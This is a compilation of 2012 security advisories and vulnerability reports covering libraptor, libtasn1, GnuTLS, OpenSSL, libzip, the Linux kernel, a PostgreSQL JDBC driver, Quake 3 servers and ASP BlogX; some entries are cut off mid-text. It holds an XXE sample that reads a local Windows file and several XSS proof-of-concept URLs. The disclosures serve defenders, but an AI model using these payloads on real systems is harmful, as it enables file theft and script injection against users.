CVE-2012-0037: libraptor - XXE in RDF/XML File Interpretation (Multiple office products affected)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
VSR Security Advisory
http://www.vsecurity.com/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Advisory Name: libraptor - XXE in RDF/XML File Interpretation
Release Date: 2012-03-24
Applications: libraptor / librdf (versions 1.x and 2.x)
Also Affected: OpenOffice 3.x, LibreOffice 3.x, AbiWord, KOffice
Author: tmorgan {a} vsecurity * com
Vendor Status: Patches available; major downstream vendors
and operating system distributions notified
CVE Candidate: CVE-2012-0037
Reference: http://www.vsecurity.com/resources/advisory/20120324-1/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Product Description
~-~
Raptor is a free software / Open Source C library that provides a set of
parsers and serializers that generate Resource Description Framework (RDF)
triples by parsing syntaxes or serialize the triples into a syntax. The
supported parsing syntaxes are RDF/XML, N-Quads, N-Triples, TRiG, Turtle, RSS
tag soup including all versions of RSS, Atom 1.0 and 0.3, GRDDL and
microformats for HTML, XHTML and XML and RDFa. The serializing syntaxes are
RDF/XML (regular, and abbreviated), Atom 1.0, GraphViz, JSON, N-Quads,
N-Triples, RSS 1.0 and XMP. -- libraptor web site [1]
libraptor is a component of librdf[2] which is used by a variety of open source
software to interpret Resource Description Framework (RDF) [3] formats.
Vulnerability Overview
~~
In December 2011, VSR identified a vulnerability in multiple open source office
products (including OpenOffice, LibreOffice, KOffice, and AbiWord) due to unsafe
interpretation of XML files with custom entity declarations. Deeper analysis
revealed that the vulnerability was caused by acceptance of external entities by
the libraptor library, which is used by librdf and is in turn used by these
office products.
In the context of office applications, these vulnerabilities could allow for XML
External Entity (XXE) attacks resulting in file theft and a loss of user privacy
when opening potentially malicious ODF documents. For other applications which
depend on librdf or libraptor, potentially serious consequences could result
from accepting RDF/XML content from untrusted sources, though the impact may
vary widely depending on the context.
Vulnerability Details
~---~
Open Document Format (ODF) files consist of a collection of several different
files stored in a ZIP archive. Included in this set is a manifest.rdf file
which is formatted according to the RDF/XML representation. The RDF format is
intended to be used for storing metadata associated with specific document
elements. The manifest.rdf file can reference secondary RDF files within the
ODF file as well as external document schemas.
The RDF file parser (librdf) used by the affected office products allows DTD
specifications within the RDF files themselves. In addition, the parser
interprets external entities which may reference arbitrary external files, HTTP
and FTP resources.
For instance, the following evil.rdf file was created within a valid ODF text
archive (.odt file) which was referenced by the internal manifest.rdf file:
?xml version=1.0 encoding=utf-8?
!DOCTYPE rdf [
!ENTITY file SYSTEM file:///c:/windows/win.ini
]
rdf:RDF xmlns:rdf=http://www.w3.org/1999/02/22-rdf-syntax-ns#;
rdf:Description rdf:about=content.xml#id1265690860
ns0:comment
xmlns:ns0=http://www.w3.org/2000/01/rdf-schema#;file;/ns0:comment
/rdf:Description
/rdf:RDF
Upon opening the malicious .odt file in OpenOffice for Windows, the
c:\windows\win.ini file was read and included in the document metadata. Upon
saving the document, this metadata was included literally in the resulting
evil.rdf file (within the .odt):
?xml version=1.0 encoding=utf-8?
rdf:RDF xmlns:rdf=http://www.w3.org/1999/02/22-rdf-syntax-ns#;
rdf:Description rdf:about=content.xml#id1265690860
ns1:comment xmlns:ns1=http://www.w3.org/2000/01/rdf-schema#;; for
16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
/ns1:comment
/rdf:Description
/rdf:RDF
The malicious XML entities could also include URLs to attacker-controlled
HTTP or FTP resources. This would allow an attacker to determine when a
document was opened, potentially resulting in reduced privacy. However, based
on current analysis of the affected office applications, the most serious attack
scenario is likely to be:
1. Attacker posts a malicious file on a web site or sends file to victim. The
file contains a form for the victim to fill out and return to the attacker.
2. Victim fills out the form, saves it, sends it back to the attacker.
3. Attacker is able to read the contents of any stolen files as embedded
metadata, simply by unzipping the
[SECURITY] [DSA 2440-1] libtasn1-3 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2440-1 secur...@debian.org http://www.debian.org/security/Florian Weimer March 24, 2012 http://www.debian.org/security/faq - - Package: libtasn1-3 Vulnerability : missing bounds check Problem type : remote Debian-specific: no CVE ID : CVE-2012-1569 Matthew Hall discovered that many callers of the asn1_get_length_der function did not check the result against the overall buffer length before processing it further. This could result in out-of-bounds memory accesses and application crashes. Applications using GNUTLS are exposed to this issue. For the stable distribution (squeeze), this problem has been fixed in version 2.7-1+squeeze+1. For the unstable distribution (sid), this problem has been fixed in version 2.12-1. We recommend that you upgrade your libtasn1-3 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJPbk3rAAoJEL97/wQC1SS+M3cH/0Paiu9LKPgbcbSOi3Mv26bx lofgEYo57A0EoaVx5nPBBM+3kyTSFdL2xjDWDdXseM7m53N8prH32jQOW4vy+ip+ zUHgXc2+wINjRQs9ywl+FONYbOdvyI3JD4r+EGWfjVPdaCixrW5GWphtmv97ZHuG o8ZxYfU6F1eqH0R9fjHqaDiZXcjq1Vn7QvJpq12Jz8iLBl2fsR0t//uB5xZr/0xN uDYHPPKHKTW+BVtRKlt2A7nYDcevQP0Qj038I/IP+zynC3LgMW8caCsK6UGUe1E9 fw8GcOHMc/bHhbbfodzmgRD4KWoy8c5FbdqzNEHJsvEJiOuusR/J6zIT1pIFQ8c= =hQt8 -END PGP SIGNATURE-
SQL injection attack possible when connecting to PostgreSQL 9.1 with version 8.1 JDBC driver
Hi, when using PostgreSQL JDBC driver version 8.1 to connect to a PostgreSQL version 9.1 database, escaping of JDBC statement parameters does not work and SQL injection attacks are possible. The problem can be reproduced for example with version 8.1-415 (released 2010-05-11), which still can be downloaded from the official download location (although in `Archived Section'), however this version is included in Linux distributions that are still supported (for example SuSE Linux Enterprise Edition with long-term support). Connecting Java applications from such a server to a recent PostgreSQL database, SQL injection attacks are possible. Java Web Applications using JDBC running on such Linux versions could allow to exploit this remotely, for example through a web app. Vendor reponse (from secur...@postgresql.org): Anything not identified there as current or supported is, by reasonable inference, neither. Reporting a security bug against anything that's not current or supported is pointless. However, such unsupported driver versions are included in supported Linux distributions. Since I think it is possible to accidentally use older (but still supported) Linux application servers against recent databases, I think a public information could be of interest. Possible fix or workaround: Do not use PostgreSQL JDBC driver version 8.1 but upgrade to most recent version. If the distribution offers no suited package (RPM), driver should be downloaded from jdbc.postgresql.org and installed manually. This breaks package management consitency but seems to be the smaller issue. How to reproduce: When the small code Postgres.java (attached) is compiled and runned with Java 1.7 and the Postgres 8.1 JDBC3 driver against a Postgres 9.1 database: $ java -cp postgresql-8.1-415.jdbc3.jar:. Postgres the following Exception occures: Exception in thread main org.postgresql.util.PSQLException: ERROR: syntax error at or near ( at character 134 The driver can be downloaded under http://jdbc.postgresql.org/download/postgresql-8.1-415.jdbc3.jar In the Archived Versions-section of http://jdbc.postgresql.org/download.html. (They are supported anymore, but there is no hint that downloading and using them in our point of view opens a security treat, so we think this is not good) When the application is run with the Postgres 9.1 JDBC3 driver, it behaves correctly. We think it is likely that JDBC drivers with 8.1-x are still used productively, for example SuSE Linux Enterprise Edition with long-term support and we are not aware of some security bulletin telling that an upgrade is recommended for security reasons, since there might be not much interest in changing running systems without need. Regards, Steffen Dettmer ---8=== * Steffen Dettmer wrote on Mon, Feb 27, 2012 at 17:36 +0100: Hi, we think we have found an escaping problem in JDBC driver 8.1 allowing SQL injection attacks when connecting to PostgreSQL 9.1 . According to http://jdbc.postgresql.org/changes.html#version_8.1-415, this issue is not known (not fixed). [...] Our software relys on correct parameter escaping when using a java.sql.PreparedStatement for SELECT stored_procedure(?, ?) AS result used with statement.setString() etc., which according to our understanding should be the usual and safe way to call stored procedures on PostgreSQL. We found that it fails with at least postgresql-8.1-407.jdbc3.jar from http://jdbc.postgresql.org/download.html and Postgres 9.1 database. The exact case where it occured in production was the query: SELECT appendJobEvent(?, ?, ?, ?) AS result with parameters set via setString(pos, value). Parameter number 4 contained single quote characters, but they should be escaped and end up in the database literally. Instead, we get: ERROR: syntax error at or near ( at character 163 (ERROR: syntax error at or near ( at character 163)' we tested and got exactly the same error message when using the string directly (i.e. not via ? and setString), which is expected. Connecting to an older database version (7.1) or updating the driver to postgresql-9.1-901.jdbc3.jar from http://jdbc.postgresql.org/download.html both make the same query with the same parameters work. Since our development environment unit tests check for a similar issue, it seems that when using the same version of JDBC driver and database (the normal configuration when having a test database on localhost), escaping probably works well in a probably wide range of versions, but not in at least this combination (8.1-407 JDBC driver to 9.1 DBMS). --[ Postgres.java ]8=== // Sascha BAER sascha.b...@ingenico.com -- SFR-1315206 // SQL injection when connecting to PostgreSQL 9.1 with version 8.1 JDBC driver import java.sql.Connection; import java.sql.DriverManager; import
[SECURITY] [DSA 2441-1] gnutls26 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2441-1 secur...@debian.org http://www.debian.org/security/Florian Weimer March 25, 2012 http://www.debian.org/security/faq - - Package: gnutls26 Vulnerability : missing bounds check Problem type : remote Debian-specific: no CVE ID : CVE-2012-1573 Matthew Hall discovered that GNUTLS does not properly handle truncated GenericBlockCipher structures nested inside TLS records, leading to crashes in applications using the GNUTLS library. For the stable distribution (squeeze), this problem has been fixed in version 2.8.6-1+squeeze2. For the unstable distribution (sid), this problem has been fixed in version 2.12.18-1 of the gnutls26 package and version 3.0.17-2 of the gnutls28 package. We recommend that you upgrade your gnutls26 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJPb2oHAAoJEL97/wQC1SS+QRgIAKYv2qHZZ2mL1DHDq4of7w/U xdSauiyXEyVh+pLiKXObfSuZhEbJQoemX8cg766sh3iXG5G81Rx9zpz1QuazNE0R NfDCHX0MCvdc74FP6lc1uCG6gWxgfma0kLP5/TxbtQ9fbmB8DwtH8hyhwC3Vac/V RbWVowElalLWEC06F9hVqF9/2WNWdkn7RAQ4w3XwsD0Lc+F9NVpwtX+sCKqVQR04 mEe7lFMoy2ZX9HhJs+x5q2VobBsd3TjdbaFTQXvcWagCQf7OK4esX2sq3nzyP4Us x0k77EYDzlVMdNunLO6L6x82Ihw2Vq2MmA79ofuyMbjMLUe9stURWGG6IcdwAf4= =jBvl -END PGP SIGNATURE-
Traffic amplification via Quake 3-based servers
It has been discovered that spoofed getstatus UDP requests are being used by attackers[0][1][2][3] to direct status responses from multiple Quake 3-based servers to a victim, as a traffic amplification mechanism for a denial of service attack on that victim. Open-source games derived from the Quake 3 engine are typically based on ioquake3 [4], a popular fork of that engine. This vulnerability was fixed in ioquake3 svn revision 1762 (January 2010) [5] by applying a rate-limit to the getstatus request. Like several other known and fixed vulnerabilities, it is not fixed in the latest official ioquake3 release (1.36, April 2009). If a CVE ID is allocated for this vulnerability, please reference ioquake3 r1762 prominently in any advisory. Fixed versions of various open-source games based on Quake III Arena, mostly based on visual inspection of their source code: * ioquake3 svn = r1762 * OpenArena = 0.8.8 * OpenArena engine snapshot = 0.8.x-20 * World of Padman = 1.5.4 * Tremulous svn trunk = r1953 * Tremulous svn, gpp branch = r1955 * Smokin' Guns = 1.1b4 * Smokin' Guns svn 1.1 branch = r472 Vulnerable older versions include: * ioquake3 engine 1.36 * OpenArena 0.8.5 * World of Padman 1.5 * Tremulous 1.1.0 * Tremulous Gameplay Preview 1 (GPP1) * Smokin' Guns svn trunk at the time of writing (r181) Proprietary games based on the Quake 3 engine (Quake III Arena when played using its official engine, Star Wars: Jedi Outcast and Jedi Academy, Star Trek: Elite Force 1 2, etc.) are also likely to be vulnerable. Proprietary games being run under the ioquake3 engine (Quake III Arena when using ioquake3, Urban Terror when using ioUrbanTerror, etc.) may be vulnerable or not vulnerable, depending on the version of ioquake3 used. [0] http://lists.ioquake.org/pipermail/ioquake3-ioquake.org/2012-January/004778.html [1] http://openarena.ws/board/index.php?topic=4391.0 [2] http://www.urbanterror.info/forums/topic/27825-drdos/ [3] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=665656 [4] http://ioquake3.org/ [5] http://icculus.org/pipermail/quake3-commits/2010-January/001679.html
[ MDVSA-2012:038 ] openssl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:038 http://www.mandriva.com/security/ ___ Package : openssl Date: March 26, 2012 Affected: 2010.1, 2011., Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in openssl: The implementation of Cryptographic Message Syntax (CMS) and PKCS #7 in OpenSSL before 0.9.8u and 1.x before 1.0.0h does not properly restrict certain oracle behavior, which makes it easier for context-dependent attackers to decrypt data via a Million Message Attack (MMA) adaptive chosen ciphertext attack (CVE-2012-0884). The mime_param_cmp function in crypto/asn1/asn_mime.c in OpenSSL before 0.9.8u and 1.x before 1.0.0h allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted S/MIME message, a different vulnerability than CVE-2006-7250 (CVE-2012-1165). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0884 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1165 ___ Updated Packages: Mandriva Linux 2010.1: 820b204b86b1f140bf8526725ee29650 2010.1/i586/libopenssl0.9.8-0.9.8u-0.1mdv2010.2.i586.rpm f19cb6b757e2502ba930c139ce6cd3c4 2010.1/i586/libopenssl1.0.0-1.0.0a-1.11mdv2010.2.i586.rpm a57c57a8ebfb75f2da2ce416218655a9 2010.1/i586/libopenssl1.0.0-devel-1.0.0a-1.11mdv2010.2.i586.rpm d5807ee096478bcca0d08f2145535f78 2010.1/i586/libopenssl1.0.0-static-devel-1.0.0a-1.11mdv2010.2.i586.rpm cacdcfe367accab7ee4ce75eefd1d28d 2010.1/i586/libopenssl-engines1.0.0-1.0.0a-1.11mdv2010.2.i586.rpm 8a3b57e03df92a2d421672a6495f34a0 2010.1/i586/openssl-1.0.0a-1.11mdv2010.2.i586.rpm 6be06368a541e654742693c6eb705fb1 2010.1/SRPMS/openssl0.9.8-0.9.8u-0.1mdv2010.2.src.rpm 2619947049700ab84d6cad214a0131f3 2010.1/SRPMS/openssl-1.0.0a-1.11mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: dfb5f411e236cc9b4b3f2e005d5f0e2e 2010.1/x86_64/lib64openssl0.9.8-0.9.8u-0.1mdv2010.2.x86_64.rpm 7ee654320d85d3f3aa0bbd94bc42453b 2010.1/x86_64/lib64openssl1.0.0-1.0.0a-1.11mdv2010.2.x86_64.rpm 1d00d58ab6be34fd3542340300038950 2010.1/x86_64/lib64openssl1.0.0-devel-1.0.0a-1.11mdv2010.2.x86_64.rpm 6c7ca81d116a60d500ffddc2f3c7fb57 2010.1/x86_64/lib64openssl1.0.0-static-devel-1.0.0a-1.11mdv2010.2.x86_64.rpm bcdac0e2468a6e06f4078f05fdafd392 2010.1/x86_64/lib64openssl-engines1.0.0-1.0.0a-1.11mdv2010.2.x86_64.rpm 836de45400c21f24fa5b21b7c706eb98 2010.1/x86_64/openssl-1.0.0a-1.11mdv2010.2.x86_64.rpm 6be06368a541e654742693c6eb705fb1 2010.1/SRPMS/openssl0.9.8-0.9.8u-0.1mdv2010.2.src.rpm 2619947049700ab84d6cad214a0131f3 2010.1/SRPMS/openssl-1.0.0a-1.11mdv2010.2.src.rpm Mandriva Linux 2011: 1960675e9fe0ae8da138ecba0bf9e6b4 2011/i586/libopenssl1.0.0-1.0.0d-2.4-mdv2011.0.i586.rpm de70876cfc6918c35b89cae61ccb2788 2011/i586/libopenssl-devel-1.0.0d-2.4-mdv2011.0.i586.rpm 68696a78df495d3245034e776ececf24 2011/i586/libopenssl-engines1.0.0-1.0.0d-2.4-mdv2011.0.i586.rpm fba71506079447ff67b7e52c15004221 2011/i586/libopenssl-static-devel-1.0.0d-2.4-mdv2011.0.i586.rpm f8992d4ee7b2c0d979a314593c590e8b 2011/i586/openssl-1.0.0d-2.4-mdv2011.0.i586.rpm 34324e854461c4102c4db333d3f575ba 2011/SRPMS/openssl-1.0.0d-2.4.src.rpm Mandriva Linux 2011/X86_64: 89645faf8d71d72afa62c2be5d21a55b 2011/x86_64/lib64openssl1.0.0-1.0.0d-2.4-mdv2011.0.x86_64.rpm 2f3e7dc11f36f7f10bc26669ea0d359a 2011/x86_64/lib64openssl-devel-1.0.0d-2.4-mdv2011.0.x86_64.rpm aecefb41191efa106dc11cfdff6e5dbc 2011/x86_64/lib64openssl-engines1.0.0-1.0.0d-2.4-mdv2011.0.x86_64.rpm ec65b7b472890dd336239605846a3a56 2011/x86_64/lib64openssl-static-devel-1.0.0d-2.4-mdv2011.0.x86_64.rpm db15536fedf4e8e8e00f1877f2939f6d 2011/x86_64/openssl-1.0.0d-2.4-mdv2011.0.x86_64.rpm 34324e854461c4102c4db333d3f575ba 2011/SRPMS/openssl-1.0.0d-2.4.src.rpm Mandriva Enterprise Server 5: 4bd8479bc2fad30096d37d498240c507 mes5/i586/libopenssl0.9.8-0.9.8h-3.14mdvmes5.2.i586.rpm 33cf65c119e4d84738619a84e598aba2 mes5/i586/libopenssl0.9.8-devel-0.9.8h-3.14mdvmes5.2.i586.rpm ca767a0cbeb99230946ebb35191b9df2 mes5/i586/libopenssl0.9.8-static-devel-0.9.8h-3.14mdvmes5.2.i586.rpm 9f3bba03e5aff24ecd26bae11c99af91 mes5/i586/openssl-0.9.8h-3.14mdvmes5.2.i586.rpm 65c9f262dd6b4d66069649ea1e596b4b mes5/SRPMS/openssl-0.9.8h-3.14mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: e0b68754036f1114ed20cf8199d7625d mes5/x86_64/lib64openssl0.9.8-0.9.8h-3.14mdvmes5.2.x86_64.rpm
Matthew1471s ASP BlogX - XSS Vulnerabilities
Title: Matthew1471s ASP BlogX - XSS Vulnerabilities Software : Matthew1471s ASP BlogX Software Version : 12 August 2008 Vendor: http://blogx.co.uk/ Vulnerability Published : 2012-03-26 Vulnerability Update Time : Status : Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:P/I:N/A:N) Bug Description : Matthew1471s ASP BlogX(version update : 12 August 2008) is vulnerable to XSS. Proof Of Concept : 1)ShowOriginal in About.asp , PoC: http://VICTIM/About.asp?ShowOriginal=;SCRIPTalert(demonalex);/SCRIPTShowNew=aShowChanges=b 2)ShowNew in About.asp , PoC: http://VICTIM/About.asp?ShowOriginal=YShowNew=;SCRIPTalert(demonalex);/SCRIPTShowChanges=b 3)ShowChanges in About.asp , PoC: http://VICTIM/About.asp?ShowOriginal=YShowNew=aShowChanges=;SCRIPTalert(demonalex);/SCRIPT 4)Search in Search.asp , PoC: http://VICTIM/Search.asp?Search=/titleSCRIPTalert(demonalex);/SCRIPTPage=0 Credits : This vulnerability was discovered by demonalex(at)163(dot)com mail: demonalex(at)163(dot)com / chaoyi.hu...@connect.polyu.hk Pentester/Researcher Dark2S Security Team/PolyU.HK
[SECURITY] [DSA 2442-1] openarena security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2442-1 secur...@debian.org http://www.debian.org/security/Florian Weimer March 26, 2012 http://www.debian.org/security/faq - - Package: openarena Vulnerability : UDP traffic amplification Problem type : remote Debian-specific: no CVE ID : CVE-2010-5077 Debian Bug : 665656 It has been discovered that spoofed getstatus UDP requests are being sent by attackers to servers for use with games derived from the Quake 3 engine (such as openarena). These servers respond with a packet flood to the victim whose IP address was impersonated by the attackers, causing a denial of service. For the stable distribution (squeeze), this problem has been fixed in version 0.8.5-5+squeeze2. For the testing distribution (wheezy) and the unstable distribution (sid), this problem has been fixed in version 0.8.5-6. We recommend that you upgrade your openarena packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJPcMUiAAoJEL97/wQC1SS+26wH/3N4FqJ58SxBJLhVsBHPBy+h 1oUEJs7XKbjjqCU876DJ7N2LgpGQNzCrLOfT3hNVMRWLnypvOLcDG3VQmmpBwn+/ XcHkSiJ4qUuSsXpQyyEN+DgmD3y7Hf21fkEUvBeQuoBjA25wJhAEptgBB00sGjRd 3MD6Nagjg3aB73WriDTXSxQKpPGLZLb4QF7xP/VYdLjxCiBWrTCgukvVhRBXUlrH 9JzHcensvTLpzkqtdUqBe4T1sisNWs5TqPmQqkpUO0IsrlW2r8QAo7+YYidhUtKa 2yULdA9xre1+PaaZ+bFV5wtzWgC2U4PoCB/7vUXRFBWGcfxfeG4Vs+DHKWM9/WQ= =crI0 -END PGP SIGNATURE-
[SECURITY] [DSA 2443-1] linux-2.6 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-2443-1secur...@debian.org http://www.debian.org/security/ Dann Frazier March 26, 2012 http://www.debian.org/security/faq - -- Package: linux-2.6 Vulnerability : privilege escalation/denial of service Problem type : local Debian-specific: no CVE Id(s) : CVE-2009-4307 CVE-2011-1833 CVE-2011-4347 CVE-2012-0045 CVE-2012-1090 CVE-2012-1097 Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or privilege escalation. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-4307 Nageswara R Sastry reported an issue in the ext4 filesystem. Local users with the privileges to mount a filesystem can cause a denial of service (BUG) by providing a s_log_groups_per_flex value greater than 31. CVE-2011-1833 Vasiliy Kulikov of Openwall and Dan Rosenberg discovered an information leak in the eCryptfs filesystem. Local users were able to mount arbitrary directories. CVE-2011-4347 Sasha Levin reported an issue in the device assignment functionality in KVM. Local users with permission to access /dev/kvm could assign unused pci devices to a guest and cause a denial of service (crash). CVE-2012-0045 Stephan Barwolf reported an issue in KVM. Local users in a 32-bit guest running on a 64-bit system can crash the guest with a syscall instruction. CVE-2012-1090 CAI Qian reported an issue in the CIFS filesystem. A reference count leak can occur during the lookup of special files, resulting in a denial of service (oops) on umount. CVE-2012-1097 H. Peter Anvin reported an issue in the regset infrastructure. Local users can cause a denial of service (NULL pointer dereference) by triggering the write methods of readonly regsets. For the stable distribution (squeeze), this problem has been fixed in version 2.6.32-41squeeze2. The following matrix lists additional source packages that were rebuilt for compatibility with or to take advantage of this update: Debian 6.0 (squeeze) user-mode-linux 2.6.32-1um-4+41squeeze2 We recommend that you upgrade your linux-2.6 and user-mode-linux packages. Thanks to Micah Anderson for proof reading this text. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBAgAGBQJPcQrKAAoJEBv4PF5U/IZAk8gP/3h2aMieT/brr09ExUnI1JQY 5GFYvlKrDJoL+G84NkwNldJKZ5vFm5MAsbpbFCdV9pDvpq4q0wfzjA2CwINmItLI QVwBSqbwXgBytngERabQr20wEaXVnHZP7tPZlEkVHOejRZOcamUncptiIFgSuaH0 ILYdriM35A6QID5evUXiBK56yBQAa8I+qJ1qH+V/ezEJY/bdrcIfWUFU8bdizcFy G+Y4lH/5ls6XaZfDC1rLCEBhWu448gL4OilkgJ3LeffsShnXUaSheAOU3TulzZPQ F5p0IhpXQ8LoVIl8N6JY/6p53M7qWuiIF9saoriJzDSqJaftHrJ/Ka73Ps5i+8zK wANNIhYAM8tK8Fnr4EIU2uYmJHSuCbBnqe0VPfcJdUJQ4q9M8N9w5nkAboPOmIS1 ULzOeznSPNoxPozNrIfi6Xr2jQaUzsjo4Ths4XtC1PuDk78Ci2C/Gfn2x7B+ye+6 TO/2oQiJ2rnp8SWQ9hOMi5Oc3YDE+v324n7on6vX97zpexnblntSj9FdMbgOnQCg 452VpkgtOdgpUeBIt304n2McsB+Uqsyg6Rkop1KsijW6uW3JRFhkSvYz2Ag0Qcz6 1P9W5Y+HLbg41REUyExrGTw7mPNtxZaRhfu1fAHLX1DqAijlwArrvtnyq6SudHNL BrZnJUyot/f3smdFF5xD =gjmU -END PGP SIGNATURE-
[PRE-SA-2012-02] Incorrect loop construct and numeric overflow in libzip
PRE-CERT Security Advisory
==
* Advisory: PRE-SA-2012-02
* Released on: 21st March 2012
* Affected products: libzip = 0.10
PHP 5.4.0
PHP = 5.3.10
zipruby = 0.3.6
* Impact: heap overflow, information leak
* Credit: - Thomas Klausner
- Timo Warns (PRESENSE Technologies GmbH)
* CVE Identifier: - CVE-2012-1162
- CVE-2012-1163
Summary
---
libzip (version = 0.10) has two vulnerabilities that may lead to a heap
overflow or an information leak via corrupted zip files. PHP (versions
5.4.0 and = 5.3.10) and the Ruby binding zipruby (version = 0.3.6) are
also affected as they include copies of affected libzip versions.
* CVE-2012-1162
libzip (version = 0.10) uses an incorrect loop construct, which can
result in a heap overflow on corrupted zip files.
On opening a zip file with zip_open, libzip reads in the number of
directory entries in the function _zip_readcdir in zip_open.c:
(192)/* number of cdir-entries */
(193)nentry = _zip_read2(cdp);
Subsequently, memory for directory entries is allocated via
_zip_cdir_new (in zip_dirent.c) based on the number of directory
entries:
(104)if ((cd-entry=(struct zip_dirent
*)malloc(sizeof(*(cd-entry))*nentry))
If the number of directories in the zip file is set to 0, 0 bytes of
memory are allocated.
_zip_readcdir finishes with reading in the directory entries in
a posttest do-while loop:
(260)do {
(261)if ((_zip_dirent_read(cd-entry+i, fp, bufp, left, 0, error))
0) {
...
(277)} while (icd-nentry left 0);
If cd-entry points to 0 bytes of allocated memory, _zip_dirent
writes beyond the allocated memory.
* CVE-2012-1163
libzip (version = 0.10) has a numeric overflow condition, which,
for example, results in improper restrictions of operations within
the bounds of a memory buffer (e.g., allowing information leaks).
On opening a zip file with zip_open, libzip reads in the size and the
offset of the central directory structure in the function _zip_readcdir
in zip_open.c:
(198)cd-size = _zip_read4(cdp);
(199)cd-offset = _zip_read4(cdp);
libzip performs a consistency check on these values, but does not
anticipate an integer overflow:
(203)if (cd-offset+cd-size buf_offset + (eocd-buf)) {
On an integer overflow, libzip continues to handle the zip file, which,
for example, can result in improper restriction of operations within the
bounds of a memory buffer.
Solution
The issue was fixed in the following versions:
libzip 0.10.1
The issue was not fixed in PHP and zipruby yet.
References
--
When further information becomes available, this advisory will be
updated. The most recent version of this advisory is available at:
http://www.pre-cert.de/advisories/PRE-SA-2012-02.txt
Contact
PRE-CERT can be reached under prec...@pre-secure.de. For PGP key
information, refer to http://www.pre-cert.de/.
[ MDVSA-2012:039 ] libtasn1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:039 http://www.mandriva.com/security/ ___ Package : libtasn1 Date: March 27, 2012 Affected: 2010.1, 2011., Enterprise Server 5.0 ___ Problem Description: A vulnerability has been found and corrected in libtasn1: The asn1_get_length_der function in decoding.c in GNU Libtasn1 before 2.12, as used in GnuTLS before 3.0.16 and other products, does not properly handle certain large length values, which allows remote attackers to cause a denial of service (heap memory corruption and application crash) or possibly have unspecified other impact via a crafted ASN.1 structure (CVE-2012-1569). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1569 ___ Updated Packages: Mandriva Linux 2010.1: 266b582ab44051653aad74cacef55741 2010.1/i586/libtasn1_3-2.6-2.1mdv2010.2.i586.rpm 4a6be65d84839edc27f239ab515cf178 2010.1/i586/libtasn1-devel-2.6-2.1mdv2010.2.i586.rpm 4047210a75f4a602d0aa29a727ed93f6 2010.1/i586/libtasn1-tools-2.6-2.1mdv2010.2.i586.rpm 80d708b77aacdd9b9df4ff47005e7808 2010.1/SRPMS/libtasn1-2.6-2.1mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: f388a96a2a83aee13730d19e23b6cc1b 2010.1/x86_64/lib64tasn1_3-2.6-2.1mdv2010.2.x86_64.rpm 7f09f8240e83930c69ff4e0b5d0018ee 2010.1/x86_64/lib64tasn1-devel-2.6-2.1mdv2010.2.x86_64.rpm 03bf20288e457918f40855ee8e7a5605 2010.1/x86_64/libtasn1-tools-2.6-2.1mdv2010.2.x86_64.rpm 80d708b77aacdd9b9df4ff47005e7808 2010.1/SRPMS/libtasn1-2.6-2.1mdv2010.2.src.rpm Mandriva Linux 2011: 3dcf447642fd754a2717641ceea8fe56 2011/i586/libtasn1_3-2.9-2.1-mdv2011.0.i586.rpm 5ea5fd4ba4a3431a517d20bd42ca2406 2011/i586/libtasn1-devel-2.9-2.1-mdv2011.0.i586.rpm db238dcc223bc469d40748c26af0357e 2011/i586/libtasn1-tools-2.9-2.1-mdv2011.0.i586.rpm d73a4e5fcfc4abb57dc3d309ed4d999e 2011/SRPMS/libtasn1-2.9-2.1.src.rpm Mandriva Linux 2011/X86_64: 5822b76067fec1f477e7f9c747cd5e85 2011/x86_64/lib64tasn1_3-2.9-2.1-mdv2011.0.x86_64.rpm 64d199ac1a6252171e44ca48e4b24d40 2011/x86_64/lib64tasn1-devel-2.9-2.1-mdv2011.0.x86_64.rpm 4b1256150cedeedfcd51d3b92764ca60 